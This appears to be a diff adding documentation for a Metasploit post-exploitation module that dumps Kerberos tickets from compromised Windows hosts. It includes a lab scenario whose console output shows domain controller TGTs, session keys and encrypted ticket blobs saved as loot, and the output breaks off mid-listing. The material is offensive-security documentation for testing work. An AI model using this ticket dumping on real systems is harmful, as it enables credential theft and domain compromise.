|
||||
```
|
||||
@@ -0,0 +1,405 @@
|
||||
Manage kerberos tickets on a compromised host. Different actions are available for different tasks. Kerberos tickets are
|
||||
associated with logon sessions which can be enumerated with the `ENUM_LUIDS` action. s
|
||||
|
||||
## Options
|
||||
|
||||
### LUID
|
||||
An optional logon session LUID to target in the DUMP_TICKETS and SHOW_LUID actions. The LUID is expressed in hex, e.g.
|
||||
`0x11223344`.
|
||||
|
||||
### SERVICE
|
||||
An optional service name wildcard to target in the DUMP_TICKETS action. This option accepts wild cards. For example, to
|
||||
dump only TGTs use `krbtgt/*` and to only dump tickets for dc.msflab.local, use `*/dc.msflab.local`. Wildcards and
|
||||
service names are case insensitive.
|
||||
|
||||
## Actions
|
||||
|
||||
### DUMP_TICKETS
|
||||
This action allows dumping kerberos tickets from a compromised host. These tickets are loaded into Metasploit's
|
||||
kerberos ticket cache when Metasploit is connected to a database. If the Meterpreter session is running with
|
||||
administrative privileges, then the tickets from all logon sessions can be dumped. If the Meterpreter session is not
|
||||
running with Administrative privileges then only the tickets from the current logon session / current user can be
|
||||
dumped. If the `LUID` option is set then only the tickets from that logon session will be dumped. Targeting a specific
|
||||
LUID with the `LUID` option requires administrative privileges.
|
||||
|
||||
### ENUM_LUIDS
|
||||
This action will enumerate the LUIDs of all active logon sessions. Some basic information is printed for each LUID.
|
||||
|
||||
### SHOW_LUID
|
||||
This action will show the LUID and some basic information about the current logon session unless the `LUID` option is
|
||||
set in which case that logon session is shown.
|
||||
|
||||
## Scenarios
|
||||
|
||||
In this case the operator lists the currently cached Kerberos tickets in the Metasploit database. After that the
|
||||
`DUMP_TICKETS` action is used with a service filter to dump the TGTs on the compromised host. Finally, the `klist`
|
||||
command is used again to show the newly added TGTs.
|
||||
|
||||
```
|
||||
msf6 post(windows/manage/kerberos_tickets) > klist
|
||||
Kerberos Cache
|
||||
==============
|
||||
No tickets
|
||||
|
||||
msf6 post(windows/manage/kerberos_tickets) > run SESSION=-1 SERVICE=krbtgt/*
|
||||
|
||||
[*] LSA Handle: 0x000001efe1bf7270
|
||||
[*] LogonSession LUID: 0x00004bc1d
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:33:17 -0400
|
||||
[*] Ticket[0]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 08:33:17 -0400
|
||||
End time: 2023-08-23 18:33:17 -0400
|
||||
Renew Till: 2023-08-30 08:33:17 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
|
||||
[*] LogonSession LUID: 0x00001052b
|
||||
[*] User: Window Manager\DWM-1
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:38 -0400
|
||||
[*] LogonSession LUID: 0x00000aa83
|
||||
[*] User: \
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: NTLM
|
||||
[*] LogonType: UndefinedLogonType (0)
|
||||
[*] LogonTime: 2023-08-23 08:32:27 -0400
|
||||
[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated.
|
||||
[*] LogonSession LUID: 0x0000ae359
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:38:08 -0400
|
||||
[*] LogonSession LUID: 0x0000ae2d3
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:38:08 -0400
|
||||
[*] LogonSession LUID: 0x00004fff8
|
||||
[*] User: MSFLAB\smcintyre
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:33:18 -0400
|
||||
[*] LogonSession LUID: 0x00004b823
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:33:17 -0400
|
||||
[*] LogonSession LUID: 0x00000b7c4
|
||||
[*] User: Font Driver Host\UMFD-0
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:37 -0400
|
||||
[*] LogonSession LUID: 0x0001f3e4f
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 09:42:34 -0400
|
||||
[*] Ticket[0]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 08:33:17 -0400
|
||||
End time: 2023-08-23 18:33:17 -0400
|
||||
Renew Till: 2023-08-30 08:33:17 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
|
||||
[*] LogonSession LUID: 0x0001243b3
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:47:47 -0400
|
||||
[*] LogonSession LUID: 0x0000003e5
|
||||
[*] User: NT AUTHORITY\LOCAL SERVICE
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Service (5)
|
||||
[*] LogonTime: 2023-08-23 08:32:38 -0400
|
||||
[*] LogonSession LUID: 0x0000ae390
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:38:08 -0400
|
||||
[*] LogonSession LUID: 0x0000ae320
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Network (3)
|
||||
[*] LogonTime: 2023-08-23 08:38:08 -0400
|
||||
[*] LogonSession LUID: 0x00000b7be
|
||||
[*] User: Font Driver Host\UMFD-1
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:37 -0400
|
||||
[*] LogonSession LUID: 0x00000b76e
|
||||
[*] User: Font Driver Host\UMFD-0
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:37 -0400
|
||||
[*] LogonSession LUID: 0x0000104e9
|
||||
[*] User: Window Manager\DWM-1
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:38 -0400
|
||||
[*] LogonSession LUID: 0x00000b77b
|
||||
[*] User: Font Driver Host\UMFD-1
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Interactive (2)
|
||||
[*] LogonTime: 2023-08-23 08:32:37 -0400
|
||||
[*] LogonSession LUID: 0x0000003e7
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: UndefinedLogonType (0)
|
||||
[*] LogonTime: 2023-08-23 08:32:26 -0400
|
||||
[*] Ticket[0]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 08:33:17 -0400
|
||||
End time: 2023-08-23 18:33:17 -0400
|
||||
Renew Till: 2023-08-30 08:33:17 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA==
|
||||
[*] Ticket[1]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 08:33:17 -0400
|
||||
End time: 2023-08-23 18:33:17 -0400
|
||||
Renew Till: 2023-08-30 08:33:17 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA==
|
||||
[*] LogonSession LUID: 0x0000003e4
|
||||
[*] User: MSFLAB\DC$
|
||||
[*] Session: 0
|
||||
[*] AuthenticationPackage: Negotiate
|
||||
[*] LogonType: Service (5)
|
||||
[*] LogonTime: 2023-08-23 08:32:37 -0400
|
||||
[*] Ticket[0]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 09:32:46 -0400
|
||||
End time: 2023-08-23 19:32:46 -0400
|
||||
Renew Till: 2023-08-30 09:32:46 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ==
|
||||
[*] Ticket[1]
|
||||
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
|
||||
Primary Principal: DC$@MSFLAB.LOCAL
|
||||
Ccache version: 4
|
||||
|
||||
Creds: 1
|
||||
Credential[0]:
|
||||
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
|
||||
Client: DC$@MSFLAB.LOCAL
|
||||
Ticket etype: 18 (AES256)
|
||||
Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e
|
||||
Subkey: false
|
||||
Ticket Length: 1006
|
||||
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
|
||||
Addresses: 0
|
||||
Authdatas: 0
|
||||
Times:
|
||||
Auth time: 1969-12-31 19:00:00 -0500
|
||||
Start time: 2023-08-23 09:32:46 -0400
|
||||
End time: 2023-08-23 19:32:46 -0400
|
||||
Renew Till: 2023-08-30 09:32:46 -0400
|
||||
Ticket:
|
||||
Ticket Version Number: 5
|
||||
Realm: MSFLAB.LOCAL
|
||||
Server Name: krbtgt/MSFLAB.LOCAL
|
||||
Encrypted Ticket Part:
|
||||
Ticket etype: 18 (AES256)
|
||||
Key Version Number: 2
|
||||
Cipher:
|
||||
a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ==
|
||||
[*] LogonSession LUID: 0x00004ff91
|
||||
[*] User: MSFLAB\smcintyre
|
||||
[*] Session: 1
|
||||
[*] AuthenticationPackage: Kerberos
|
||||
[*] LogonType: Interactive (2)
|
